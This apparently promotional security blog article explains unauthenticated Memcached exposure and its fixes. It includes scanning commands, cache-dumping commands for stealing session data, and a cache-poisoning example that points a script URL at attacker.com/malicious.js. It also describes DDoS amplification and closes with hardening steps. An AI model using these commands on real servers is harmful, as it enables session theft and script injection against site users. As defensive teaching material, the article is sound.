What is Memcached Unauthenticated Access? Ways to Exploit, Examples and Impact

Memcached is a high-performance, distributed memory object caching system designed to speed up dynamic web applications by alleviating database load. However, when left exposed to the public internet without proper authentication, it becomes a significant security liability. This guide explores the technical details of Memcached unauthenticated access, how attackers exploit it, and the devastating impact it can have on infrastructure.

What is Memcached?

To understand the vulnerability, we must first understand the service. Memcached is an in-memory key-value store. It is frequently used to store results of database calls, API calls, or page rendering to improve performance. By default, Memcached listens on TCP and UDP port 11211.

Historically, Memcached was designed for use within trusted internal networks. Because of this design philosophy, it does not have authentication enabled by default. Developers are expected to firewall the service or bind it to a local interface. When these steps are skipped, any user who can reach the IP address and port can interact with the data stored in memory.

Understanding Memcached Unauthenticated Access

Unauthenticated access occurs when a Memcached instance is reachable over the network without requiring a password or cryptographic key. Since the Memcached protocol is simple and text-based (ASCII), an attacker can use tools as basic as telnet or netcat to interact with the service.

The core issue is that the service trusts any incoming connection. This allows an external party to execute commands to read data, modify it, or even use the server as a launchpad for larger attacks. In the context of modern cloud environments, many developers accidentally expose these instances by using permissive Security Groups or failing to configure the memcached.conf file correctly.

How to Identify Exposed Memcached Instances

Security researchers and attackers alike use scanning tools to find exposed Memcached servers. The most common method is using nmap to check for port 11211.

Using Nmap to Scan for Memcached

You can identify a Memcached service and its version using the following command:

nmap -sV -p 11211 <target-ip>

To go a step further, Nmap includes a script specifically for Memcached discovery and basic information gathering:

nmap -p 11211 --script memcached-info <target-ip>

If the output shows a list of statistics such as uptime, version, and curr_items, the instance is unauthenticated and exposed.

Manual Verification via Telnet

A simple way to verify access is to connect via telnet:

telnet <target-ip> 11211

Once connected, typing the command stats and hitting enter will return the server's internal metrics. If you see a stream of data instead of a "Connection refused" or "Authentication required" message, the server is vulnerable.

Ways to Exploit Memcached Unauthenticated Access

Exploitation generally falls into three categories: Data Exfiltration, Data Manipulation, and Denial of Service (DDoS) Amplification.

1. Data Exfiltration: Dumping Keys and Values

Because Memcached stores application data, an attacker can dump the contents of the cache to find sensitive information. This might include session tokens, user credentials, API keys, or database fragments.

To see what is inside, an attacker first identifies the "slabs" (memory segments):

stats items

Once the items are identified, they can dump the keys associated with a specific slab. For example, to dump keys from slab ID 1:

stats cachedump 1 100

This command returns up to 100 keys stored in slab 1. With the keys in hand, the attacker can retrieve the actual data using the get command:

get session_user_12345

If the application stores serialized PHP objects or JSON-encoded session data, the attacker can hijack active user sessions without ever knowing a password.

2. Data Manipulation: Poisoning the Cache

If an attacker can read data, they can also write it. By using the set command, an attacker can overwrite existing cache entries. This is known as cache poisoning.

Imagine an application that caches the URL of a JavaScript file. An attacker could overwrite that entry with a link to a malicious script:

set script_url 0 3600 35
https://attacker.com/malicious.js

When the legitimate application next requests script_url, it receives the malicious link, leading to a Cross-Site Scripting (XSS) attack against all users of the platform.

3. The Memcached DDoS Amplification Attack

Perhaps the most famous exploitation of Memcached is its use in Distributed Denial of Service (DDoS) attacks. This leverages the UDP implementation of the Memcached protocol.

In a reflection attack, an attacker sends a small request to the Memcached server but spoofs the "Source IP" to be the IP address of their victim. Because Memcached can return a massive amount of data (the amplification factor) for a tiny request, the victim is flooded with traffic.

In 2018, GitHub was hit by a record-breaking 1.35 Tbps DDoS attack using this exact method. The amplification factor for Memcached can be as high as 51,000x, meaning a 1-byte request can result in 51KB of traffic sent to the victim.

Real-World Impact

The impact of an exposed Memcached instance ranges from privacy breaches to total service outages.

• Information Disclosure: Sensitive PII (Personally Identifiable Information) can be leaked if the cache stores user profiles or temporary data.
• Account Takeover: Session IDs stored in Memcached are prime targets for attackers looking to bypass login screens.
• Infrastructure Costs: If your servers are used in a DDoS amplification attack, you may face massive bandwidth bills and potential suspension from your cloud provider.
• Reputational Damage: Data leaks resulting from simple misconfigurations are often viewed harshly by customers and regulators.

How to Prevent Memcached Unauthenticated Access

Securing Memcached is straightforward and should be a standard part of any deployment checklist.

1. Bind to Localhost

By default, Memcached should only listen on the local loopback interface. You can verify this in your configuration file (usually /etc/memcached.conf). Ensure the -l parameter is set to 127.0.0.1:

# Run memcached as a daemon. This command is implied, and is not needed for the
# config file. Be careful that you don't list options here which are also
# listed on the command line.
-d

# Log memcached's output to /var/log/memcached.log
logfile /var/log/memcached.log

# Specify which IP address to listen on. The default is to listen on all IP addresses
-l 127.0.0.1

After changing this, restart the service:

sudo systemctl restart memcached

2. Enable SASL Authentication

If you must access Memcached over a network, you should enable Simple Authentication and Security Layer (SASL). This requires users to provide a username and password to interact with the service.

Start Memcached with the -S flag to enable SASL support. You will also need to configure a memcached-sasl database.

3. Use Firewalls and Network Segmentation

Never expose port 11211 to the public internet. Use iptables, ufw, or cloud-native Security Groups to restrict access to specific trusted IP addresses (e.g., your web server's private IP).

Example using UFW to allow only a specific internal IP:

sudo ufw allow from 10.0.0.5 to any port 11211
sudo ufw deny 11211

4. Disable UDP if Not Needed

Since the UDP protocol is the primary vector for DDoS amplification, it is highly recommended to disable it if you only use TCP. You can do this by adding -U 0 to your configuration.

Conclusion

Memcached unauthenticated access is a classic example of how a tool designed for performance can become a weapon if security is treated as an afterthought. From simple data theft to record-breaking DDoS attacks, the risks are too high to ignore. By following basic hardening steps-binding to localhost, using firewalls, and disabling UDP-you can enjoy the performance benefits of Memcached without the associated security headaches.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.